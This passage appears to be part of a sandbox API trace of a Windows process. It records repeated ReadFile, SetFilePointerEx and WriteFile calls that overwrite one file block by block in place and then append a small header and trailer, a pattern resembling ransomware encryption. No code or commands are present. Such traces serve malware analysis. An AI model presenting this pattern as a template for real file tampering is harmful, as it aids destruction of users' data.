lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.414] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.437] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.437] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.438] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.487] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.487] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.487] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.488] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.488] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.490] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.490] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.491] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.491] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.491] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.491] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.491] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.491] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.491] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.491] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.492] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.492] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.492] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.492] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.492] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.492] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.492] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.493] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.493] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.493] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.493] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.493] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.493] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.493] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.494] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.494] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.494] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.494] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.494] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.494] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.494] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.495] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.495] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.495] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.495] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.495] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.496] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.579] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.579] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.579] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.579] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.579] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.580] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.580] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.580] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.580] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.580] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.580] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.580] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.580] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.581] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.581] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.581] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.581] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.581] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.581] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.581] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.582] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.582] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.582] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.582] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.582] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.582] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.582] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.582] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.583] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.583] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.583] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.583] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.583] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.583] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.583] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.584] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.584] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.584] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.584] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.584] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.585] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.585] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.585] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.585] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.585] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.585] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.585] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.586] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.586] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.586] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.586] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.586] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.586] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.586] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.586] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x2800, lpOverlapped=0x0) returned 1 [0180.587] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce23c*=0x76c, lpOverlapped=0x0) returned 1 [0180.587] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff894, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0180.587] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x76c, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce23c*=0x76c, lpOverlapped=0x0) returned 1 [0180.587] GetProcessHeap () returned 0x2c0000 [0180.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0180.587] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.587] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce27c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x25ce27c*, lpNumberOfBytesWritten=0x25ce23c*=0x4, lpOverlapped=0x0) returned 1 [0180.587] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce23c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce23c*=0x30, lpOverlapped=0x0) returned 1 [0180.587] CloseHandle (hObject=0xb0) returned 1 [0180.587] GetProcessHeap () returned 0x2c0000 [0180.587] RtlAllocateHeap (HeapHandle=0x2c0000, 